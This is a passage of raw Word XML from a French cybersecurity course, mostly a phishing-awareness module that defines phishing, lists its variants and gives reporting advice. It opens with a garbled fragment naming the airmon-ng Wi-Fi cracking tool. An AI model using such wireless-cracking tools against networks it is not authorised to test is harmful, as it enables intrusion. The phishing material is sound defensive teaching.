      </w:r>
    </w:p>
    <w:p w14:paraId="602C899D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">« </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Airmon-ng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> crack </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A84412" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D483FED" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C95BAF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62CF3AB0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_ny0gxtd3ecpn" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="71"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Module </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>8  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hameçonnage (Phishing) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430B6447" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2712D8AD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_aqo7gol4qs5d" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="72"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>1  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve"> Qu’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>est ce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve"> que le phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190F395F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>L'hameçonnage ou phishing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">est une technique utilisée par des fraudeurs pour obtenir des renseignements personnels dans le but de perpétrer une usurpation d’identité. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7818A0CA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63DD56D3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>L'hameçonnage ou phishing est une forme d’escroquerie sur internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D58B6CB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Le fraudeur se fait passer pour une organisation que vous connaissez (banque, service des impôts </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,) en utilisant le logo et le nom de cet organisme. Il vous envoie un mail vous demandant généralement de “mettre à jour” ou de “confirmer vos infos </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>suite à un</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> incident technique”, notamment vos coordonnées bancaires (numéro de compte, codes personnels, etc.). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6950EE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5652835D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pourquoi le phishing fonctionne ?   et   Qu’elle est la cause du bon fonctionnement ? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36867CDF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60715B0A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ca</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> fonctionnement car l’être humain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BE7B47" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">C’est le maillon faible de la chaîne de sécurité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618C3B2B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">En tant qu’être social il est vulnérable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC6BB82" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721450BA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1069DBFF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="482972D1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Que faire ? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7926AA11" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attention !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ne répondez jamais à ces messages, ne cliquez pas sur les liens, n’ouvrez pas les pièces jointes ! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B574ED4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Signalez les escroqueries auprès du site </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r w:rsidR="00223B72">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.internet-signalement.gouv.fr</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F77F036" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Supprimez les messages puis videz la corbeille</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77470F3F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S’il s’agit de votre messagerie pro, transférez courriels au service informatique et au responsable de la sécurité des systèmes d’infos de votre employeur pour vérification. Attendez leur réponse avant de supprimer le courriel électronique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C20D699" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Allez sur la plateforme cybermalveillance.gouv.fr : que vous soyez professionnel ou particulier, vous y trouverez des conseils et serez guidés pour tenter d'identifier la nature de l’incident dont vous êtes victime. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D5AF62" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB6098F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_a5rg5aa2e6rv" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="73"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 2 - Les différentes types de Phishing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24998D51" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="31CF1227" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_rsov9aukk2yf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="74"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t xml:space="preserve">1 - Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t>spear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t xml:space="preserve"> phishing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF81EB5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1CBEFCF8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dans ce cas, l’attaquant doit disposer d’infos préalables sur vous, telles que votre nom complet, votre numéro de téléphone, votre adresse, etc. Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>spear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> phishing peut avoir lieu par le biais d’un e-mail, d’un SMS ou d’un appel téléphonique. Au cours de ce type d’attaque, vous êtes facilement convaincue parce que l’attaquant dispose d’infos sur vous qui lui donnent l’impression d’être légitime et digne de confiance. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FB6945" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7902583A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69FF92F1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_rwwgq5or431y" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="75"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t xml:space="preserve">2 - Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t>Whaling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB51AB8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ACEBF4A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Il s'agit d’un type d’attaque qui vise les personnes en vue plutôt que les gens ordinaires, tel que le PDG d’une entreprise. L’objectif de ce type d’attaque est d'obtenir l’accès à des données de haut niveau ou à des infos classifiées. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088D4770" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EFA4717" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5286080F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_c963tfg3sytq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="76"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t xml:space="preserve">3 - Le pharming </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF004F5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="64FB1F37" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Via ce type d’attaque par hameçonnage, vous êtes redirigée d’un site légitime vers un site usurpé, également connu sous le nom de faux site. Le but de cette redirection est de vous amener à saisir ses informations personnelles afin de les voler. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E976B2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677B4BD9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_sx1fv6bdve77" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="77"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t xml:space="preserve">4 - Le smishing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0019C516" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77AA9D21" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Également connu sous le nom de phishing par SMS, il consiste à recevoir un SMS vous demandant de cliquer sur un lien. Le message peut être formulé comme s’il contenait une offre de produit gratuit ou une alerte. L’attaquant peut utiliser vos infos personnelles, dans le but de vous convaincre que le message est réel afin que vous divulguer des données. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675AE769" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="256C8854" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_mjbuertxvxf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="78"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t xml:space="preserve">5 - Le Clone phishing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB6C88B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32386805" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’hameçonnage par clonage consiste pour un pirate à cloner un e-mail provenant d’un E légitime et vous le renvoyer. Cependant, l’e-mail cloné contient des liens malveillants et des logiciels malveillants qui infecteront votre appareil. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FB5465" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE17299" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF60B23" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_7ff7yftj3rl9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="79"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t>6 - Le Pop-up phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D15EFFD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA4B88A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lors de ces attaques, un message s’affiche pendant que vous naviguez sur le web et vous indique que quelque chose ne </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>vas</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pas au niveau de la sécurité de votre appareil. Il vous invite ensuite à analyser votre appareil, mais cette opération l’infecte de logiciel malveillant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33487B3F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EACF620" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6B2C73" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:jc w:val="both"/>
